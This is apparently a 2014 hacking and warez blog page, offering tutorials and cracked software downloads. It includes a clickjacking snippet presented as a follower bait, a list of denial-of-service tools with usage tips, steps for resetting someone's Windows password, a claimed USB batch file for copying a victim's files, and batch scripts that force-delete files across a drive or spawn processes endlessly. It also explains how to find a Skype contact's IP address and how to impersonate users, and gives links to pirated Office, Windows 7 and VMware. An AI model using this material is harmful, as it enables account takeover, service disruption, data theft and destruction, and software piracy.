Intresting Things
Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks
Intresting Things
Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks
Intresting Things
Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks
Intresting Things
Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks
Intresting Things
Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks
Friday, 26 December 2014
TOP 5 WEBSITES TO DOWNLOAD FREE EBOOKS
Saturday, 20 December 2014
how to hack someone by clickjacking
Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.
Code:
<style>
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>
<div>Click on the link to get more followers:</div>
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>
<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>
<div>You'll be get 10000 followers..!!</div>
Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!
Sunday, 12 October 2014
DOS Attacks and Free DOS Attacking Tools
Free DOS Attacking Tools
1. LOIC (Low Orbit Ion Canon)
LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.
It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.
You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.
This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.
The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.
Download LOIC Here: Click Here
2. XOIC
XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.
In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.
It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.
Download XOIC: Click Here
3. HULK (HTTP Unbearable Load King)
HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.
It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.
The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.
Download HULK here: Click Here
4. DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.
This tool is written in C++ and runs on Linux systems.
These are main features of DDOSIM:
- Simulates several zombies in attack
- Random IP addresses
- TCP-connection-based attacks
- Application-layer DDOS attacks
- HTTP DDoS with valid requests
- HTTP DDoS with invalid requests (similar to a DC++ attack)
- SMTP DDoS
- TCP connection flood on random port
Download DDOSIM here: Click Here
5. R-U-Dead-Yet
R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.
Download RUDY: Click Here
6. Tor’s Hammer
Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.
Download TOR’s Hammer here: Click Here
7. PyLoris
PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.
Download PyLoris: Click Here
8. OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.
Download here: Click Here
9. DAVOSET
DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.
Download DavoSET: Click Here
10. GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
Download GoldenEye: Click Here
Detection and Prevention of Denial of Service Attack
A DOS attack is very dangerous for an organization, so it is important to know and have a setup for preventing one. Defenses against DOS attacks involve detecting and then blocking fake traffic. A more complex attack is hard to block. But there are a few methods that we can use to block normal DOS attack. The easiest way is to use a firewall with allow and deny rules. In simple cases, attacks come from a small number of IP addresses, so you can detect those IP addresses and then add a block rule in the firewall.
But this method will fail in some cases. We know that a firewall comes at a very deep level inside the network hierarchy, so a large amount of traffic may affect the router before reaching the firewall.
Blackholing and sinkholing are newer approaches. Blackholing detects the fake attacking traffic and sends it to a black hole. Sinkholing routes all traffic to a valid IP address where traffic is analyzed. Here, it rejects back packets.
Clean pipes is another recent method of handling DOS attacks. In this method, all traffic is passed through a cleaning center, where, various methods are performed to filter back traffic. Tata Communications, Verisign, and AT&T are the main providers of this kind of protection.
As an Internet user, you should also take care of your system. Hackers can use your system as a part of their zombie network. So, always try to protect your system. Always keep your system up to date with the latest patches. Install a good antivirus solution. Always take care while installing software. Never download software from un-trusted or unknown sources. Many websites serve malicious software to install Trojans in the systems of innocent users.
Conclusion
In this article, we learned about the denial of service attack and tools used to perform the attack. DOS attacks are used to crash servers and disrupt service. Sony has faced this attack for a long time and lost millions of dollars. It was a big lesson for other companies who rely on server-based income. Every server should set up a way to detect and block DDOS attacks. The availability of free tools makes it easier to perform DOS attack against a website or server. Although most of these tools are only for DOS attacks, a few tools support a zombie network for DDOS attacks. LOIC is the most used and most popular DOS attacking tool. In the past few years, it has been used many times by hackers against big company’s network, so we can never deny the possibility of attack.
So, every company should take care of it and set up good level of protection against DOS attack.
follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
How to Hack/Bypass windows password
Steps to Hack Windows Password:-
1 ) Download the zip file from Here.
2 ) Extract it.
3 ) There will be a .iso file . Burn that file to cd using nero/poweriso or anyother software you have.
4 ) Boot using this cd ie insert this cd in CD-Rom and restart [Make sure that cd-rom has the highest boot priority]
5 ) After booting ,It will show a menu , Choose “Mini windows xp”.It will take some time to launch.
6 ) After it is finished ,You will be having a windows classic style desktop.
7 ) Click on start>>Hiren boot cd menu [HBCD menu]
8 ) It will open a dialogue box,click on “Menu” >>click on “password and keys”, there you will be having a list of softwares,click on “”Password renew””.
9 ) Now click on select target ,Browse to your windows ie “c:windows” and press ok.
10 ) Click on “Renew exisiting user password” and then choose the Your user account .
11 ) Enter the desired password and hit install.
12 ) You are now done just restart Your pc and login using your new password.
Sunday, 28 September 2014
How to Crash Someone Skype 2014
Only for Educational Purpose.
Use at Your Own Risk
Enjoy :-)
follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
Tuesday, 23 September 2014
How to steal files with a USB
How to use it:
1. Download the link provided and save it onto a USB.
2. Go to your victims computer and click on softwresandbooks.bat
3. Then you will get a copy of all there files on your usb.
Will take less then a minute for all there main files to convert to the USB..
HaHaHaHa..
Enjoy..
follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
Monday, 22 September 2014
Batch Programming for Beginners
DOS Variables:
in dos there are 2 types of variables
1-Local Environment Variables
2-User Defined variables
1-Local Environment Variables are the variables used by windows..to check these variables and there values just open cmd
and type following command
code:
set
a lot of data will appear on screen.. i.e. HOMEDRIVE=C: , USERNAME=Softwresandbooks etc
here "HOMEDRIVE" is variable name and "C:" is its value
to use value of variable we place % sign at start and end of variable name i.e. %HOMEDRIVE% , %USERNAME% etc
run following commands on cmd and check output values of local var
code:
echo %HOMEDRIVE%echo %USERNAME%
u can use advanced commands with these variables like this
code:
cd %HOMEDRIVE%net user %USERNAME%
2-User Defined Variables are defined by users.In DOS to declare a variable we use command "set" (without quotes)
Basically there are 2 types of user defined variables
1-Prompting------------> set /p (declaration command)
2-Arithmatic-----------> set /a (declaration command)
Code:
@echo offecho Enter Choiceset /p choice=echo Your Choice is %choice%pauseexit
write this code in notepad and save it with .bat extension i.e. softwresandbooks.bat and run it
code briefing:
here in this code @echo off won't echo (display) our input commands rather it will just display outputs of those commands
on 3rd line i m creating a variable named "choice" ..its being created by /p switch../p denotes prompting type variables
..this variable will prompt user for an input and on 4th line i m displaying output of variable "choice" ..pause command halts code execution
and prompts user for pressing any key to proceed further
code:
@echo offecho Enter Xset /p x=echo Enter Yset /p y=set /a sum=x+yecho sum:%sum%pauseexit
Make bat file and run it
Code Briefing:
in above code we are getting 2 variables x and y by prompting varaibles.and after that we are getting their sum by arithmatic variable
now as we have got basics of variables in DOS ..so lets use these
I m now going to make a batch file which will kill running process
Task killer batch file:
======================
Code:@echo offtitle Task Killercolor 0Aecho *************Welcome to Task Killer**************set /p task="Enter task name you want to kill:"taskkill /IM %task%pauseexit
Code Briefing:
taskkill command is used to kill tasks..for furthur information about it type
code:
taskkill /?
in cmd and get its all info
color command is used to change background and text color of cmd ..it accepts hex values in its parameter i.e. color 0A in this zero value will change background color and HEX value "A" will change text color ..try different values for fun ..i.e.color FF ,color 05 etc
title command gives title to running cmd console which appears on top of command prompt window..
Make bat file and run it..to verify it run firefox ..and in our batch script give input "firefox.exe" ..our batch file will kill this process
and would prompt a success msg
Note:(following 2 codes are same so don't get confuse with variable declaration)
set /p task="Enter"
and
echo Enter
set /p task=
---------------------------------------------------------------------
now lets make some rocking code
this following batch file will delete provided file from dir and all subdirectories of a drive ..cool
File Deleting Batch Code
========================
@echo offtitle Delete Destuction Codecolor 0C:loopecho =============Welcome to Delete Destruction Code================echo.set /p drive="Enter the logical drive where file exists(i.e. C:"echo.%drive%set /p file="Enter File name to be deleted from whole logical drive(i.e. zahid.txt):"del /F /Q /S %file%goto looppauseexit
Code Briefing:
in above code i used " :loop " ...this notation is called label..after a colon sign u can use any name to declare a label i.e. :home , :back etc
each and every command written after a label delaration will inside the body of label ..
goto command is used to jump to some label ..like in this code we used goto command to jump to label named loop and running our code repeatedly
Make bat file of it and run it..u can give *.* input to delete all available files on logical drive ..so bros use it on ur own risk
Buffer OverFlow Virus
=====================
Code:
@echo offtitle Buffer Overflow Viruscolor 0Cecho Welcome to Buffer Overflow Virusecho.:virusstart /max calc.exegoto virus
exit
Code Briefing:
start command is used to start any application through DOS... /max switch indicates that all opened apps will be maximized after opening
Save it as bat file and run it ...it will make u restart ur PC
How to Get the IP Address of the target Using Skype

Log onto the computer as the "Administrator." Go to "Start" > "Search."
Enter "cmd" into the "Search" box. Press "Enter."
Go to "Start" > "Programs" > "Skype."
Click "Contacts" and then click on the name of a contact on the menu.
Click "Call" and wait until the other person answers. If he does not answer, try again at another time, because he must accept the call for you to get his IP address.
Go back to your "Command Prompt" window. Type "netstat -nb" and press "Enter."
Look for "Skype" on the list of running programs. Write down the IP address listed next to it. This is your Skype contact's IP address.
follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
SKYPE Fake Quote Generator Free 2014
If you want to impersonate someone, you have to use the real Skype account name, not the display name (but it will display it)
follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
Friday, 19 September 2014
Office 2010 Full Version Free Download With crack

Express your ideas and create visual impact
- Edit your pictures right within select Office 2010 programs. Try an array of eye-catching artistic effects and new background removal tool to add polish to your images.
- Add flair to your text with new OpenType typography in Word 2010 and Publisher 2010. Use ligatures, stylistic sets, and other typography features available in many OpenType fonts.
- Easily edit your embedded videos right in PowerPoint 2010, with no additional software needed. Trim, add fades and effects, or even include bookmarks in your video to trigger animations.
Boost your productivity with easy-to-use tools
- Office 2010 simplifies how you find and use features. The new Microsoft Office Backstage™ view replaces the traditional File menu to give you centralized and easy access to operations such as save, share, print, and publish. With the improved Ribbon, you can access more commands quickly and customize it to fit your work style.
- Use the new Paste with Live Preview feature, available in many Office 2010 applications, to preview your Paste Options before you paste.
- Store, organize, and track information in one place to stay connected to all of your thoughts and ideas with OneNote 2010. Enhanced navigation, search tools, new page versions, and wiki linking help you find and track your resources quickly. You can even take notes while working in Word 2010, PowerPoint 2010, or Internet Explorer, and link those notes automatically back to the source content.
- Find what you need faster with the improved Navigation Pane in Word 2010. Quickly browse by headings or use the integrated Find tools to instantly search your document with all of your results highlighted.
Bring new insights to your information and make better decisions
- Turn complexity into clarity with new visualization tools in Excel 2010. Add a visual summary of your analysis alongside your values with tiny charts called Sparklines. Use a Slicer to dynamically filter data in a PivotTable or PivotChart and display only the relevant details
- Design your own database faster than before in Access 2010, even if you’re not a database expert. With new features such as Application Parts, you can add prebuilt components to your database in just a few clicks. Use Access 2010 to design Navigation Forms for your frequently used forms and reports using drag-and-drop functionality.
Break down location and communication barriers
- With new co-authoring capabilities in Office 2010, you can edit your files simultaneously with people in different locations. Co-authoring is available in Word 2010, PowerPoint 2010, OneNote 2010, Excel Web App, and OneNote Web App.2
- The new Broadcast Slide Show feature in PowerPoint 2010 lets you instantly broadcast your live presentation over the Web. Your remote audience can view your presentation in high fidelity, even if they don’t have PowerPoint installed.
- Reduce information overload and manage your e-mail more efficiently in Outlook 2010. The improved Conversation View and new conversation management tools enable you to clean up redundant messages or ignore an e-mail discussion. The Ignore feature moves current and all future messages to your Deleted Items folder. With the new Quick Steps, you can perform multi-step tasks, such as reply and delete, all within a single click.
- With Microsoft Lync integrated throughout several Office 2010 programs, you can determine the availability of your colleagues, such as when co-authoring a document in Word or viewing your e-mails in Outlook. Initiate conversations directly from your application including instant messaging and even voice calls. 3
Get the information you need when, where, and how you want
- Office Web Apps are online companions to your Microsoft Office 2010 applications. Post your files to a SharePoint site or your Windows Live SkyDrive folder, then access and edit them from virtually any computer with an Internet connection.
- With Microsoft Lync integrated throughout several Office 2010 programs, you can determine the availability of your colleagues, such as when co-authoring a document in Word or viewing your e-mails in Outlook. Initiate conversations directly from your application including instant messaging and even voice calls. 3
Get the information you need when, where, and how you want
- Office Web Apps are online companions to your Microsoft Office 2010 applications. Post your files to a SharePoint site or your Windows Live SkyDrive folder, then access and edit them from virtually any computer with an Internet connection. 4
- Microsoft Office Mobile brings powerful and familiar Microsoft Office tools you rely on to your Windows Phone 7 devices.5 Experience a rich interface specifically suited to your mobile device’s screen and easily take action when you’re on the go.
- SharePoint Workspace 2010, formerly known as Microsoft Office Groove, expands the boundaries of your SharePoint 2010 content. Easily update on your documents and lists offline. When you’re back online your revisions will synchronize to the server automatically.
Wednesday, 17 September 2014
All Importand dll File Of All Games Free Download


follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
Windows 7 Full Register Windows No Need To Activate Free Download
Windows 7 Full Windows No Need To Activate Free Download Just Download And Install From USB OR boot able Cd No Need To Activate Full Register Window Enjoy....
Desktop
Themes
Support for topic has been extended in Windows 7. In supplements to backdrop the colors of the window chrome, desktop background, desktop icons, mouse pointers and sound schemes, topic in Windows 7 include desktop slideshow settings. A new control panel interface, accessible through the "Personalize" background menu scoop on the desktop, has been introduced which provides the talent to customize and switch between themes, as well as download more themes from Microsoft's web site. Support for "theme packs" is included; topic group are chest queue with an extension of .themepack, and consist of a .theme as well as any number of image, sound, icon, and mouse cursor files.[2] Windows 7 recognizes this queue pattern and evidence switch the user's topic to the theme contained inside when opened. A Windows 7 topic tins also specify an RSS meal from which new desktop backdrop images tins be downloaded.
Desktop Slideshow
Windows 7 includes a desktop slideshow that changes the desktop background in a designated count of time with a smooth stain transition. This feature supports pre-downloaded sets of wallpapers and also supports snapshot RSS feed.
Gadgets
Windows Vista introduced Gadgets and a sidebar which provides the skill to refuge Gadgets to the period of the user's desktop. In Windows 7, the sidebar has been removed, while contraption can still be placed on the desktop. Gadgets snap to certain stance on the desktop and from each other; dragging with the Shift key held down prevents contrivance from automatically snapping into position. Windows 7 adds a Windows Media Center gadget to the default mixture while ejection the Contacts and Notes gadgets.
Managing gadgets is more closely integrated with Windows Explorer, but the gadgets themselves continue to operate in a separate sidebar.exe process.[4] The Desktop context menu includes a new "Gadgets" menu option to access the gadget gallery, and a "View" sub-menu option to market or hide gadgets. Hiding contraption consequences in the sidebar.exe direction entity unloaded, which Microsoft says is a power-saving practice. Unlike Windows Vista, all contraption run in a single process, which saves memory, and the process is not run at all if the user has no appliance on the desktop. Gadgets tins be brought to the foreground on vertex of active persistence by pressing Win+G.
Branding and customization
OEMs and boldness are able to customize the logon screen wallpaper of Windows 7 that is displayed before a exploiter timber on.
VMware 9 Full Version With Key Free Download

Access from Almost any Device
Workstation’s new web interface allows you to access your virtual machines running in Workstation or vSphere on a tablet, smart phone, PC or any device with a modern browser. No plugins necessary. Now you can power on, off, or suspend your virtual machines and interact with them from almost anywhere.
Backed by over a decade of proven engineering, VMware Workstation is trusted by users worldwide. VMware Workstation is the winner of over 50 awards including the 2010 Redmond Magazine Readers Choice Award and the 2011 Dr. Dobb’s Jolt Product Excellence Award, and has been inducted into the Jolt Hall of Fame.
Works the Way You Do
VMware Workstation’s user interface has been designed for a connected workspace with clear menus, live thumbnails and a robust virtual machine library. The virtual machine library makes it easy to view your local and remote virtual machines. Use search to quickly find the virtual machines that you need whether they are running on your local PC, VMware vSphere or another instance of Workstation on the network.
Run Multi-tiered Applications on a Single PC
Manage multiple, network-connected virtual machines with Folders. Folders make it easy to start and run complex multi-tier enterprise applications on a single PC with just a click of the mouse.

follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page
Latest NVIDIA PhysX Software For Gaming Free Download
power in physical games to the next level.
Without accurate physics simulations, even the most beautiful game feels static and lifeless. Physical CPU PhysX taps into the GPU for complex physics calculations. Used in popular games like Borderlands 2 and Metro: Last Light gives life PhysX games with dynamic destruction, based liquid particles, and life, such as animation.

Link Here
Friday, 12 September 2014
Free Java Download
Java technology allows you to work and play in a secure computing environment. Upgrading to the latest Java version improves the security of your system, as older versions do not include the latest security updates.
Java allows you to play online games, chat with people around the world, calculate your mortgage interest, and view images in 3D, just to name a few.
Webcam And Screen Recorder Free
You can also record sound with the video. You can use the program to capture webcam sessions with your buddies and save those precious memories forever.
VLC Media Player
Features
Simple, fast and powerful media player.Plays everything: Files, Discs, Webcams, Devices and Streams.
Plays most codecs with no codec packs needed:
MPEG-2, DivX, H.264, MKV, WebM, WMV, MP3...
Runs on all platforms: Windows, Linux, Mac OS X, Unix...
Completely Free, no spyware, no ads and no user tracking.
Can do media conversion and streaming.
Wednesday, 10 September 2014
Icare Data Recovery Full Version

Restore deleted partition files, deleted data, emptied recycle bin data
Recover data from virus attack, damaged partition
Recover files lost without reason
100% Data Rescue
Read-only data recovery software which won't do any damage
Recover any type of storage media that can be used on Windows PC
100% recover unlimited GB data for free
Convert Easily Audio,Video,Pictures into different format

Video formats | |||||
---|---|---|---|---|---|
3GP (.3gp)
MPEG-1 (.mpg) Matroska (.mkv) Flash Video (.flv) SWF (.swf) MPEG-4 Part 14 (.mp4) Audio Video Interleave (.avi) Windows Media Video (.wmv) RealMedia Variable Bitrate (.rmvb) VOB (Video Object) (DVD file) (.vob) QuickTime File Format (QTFF) (.mov)
|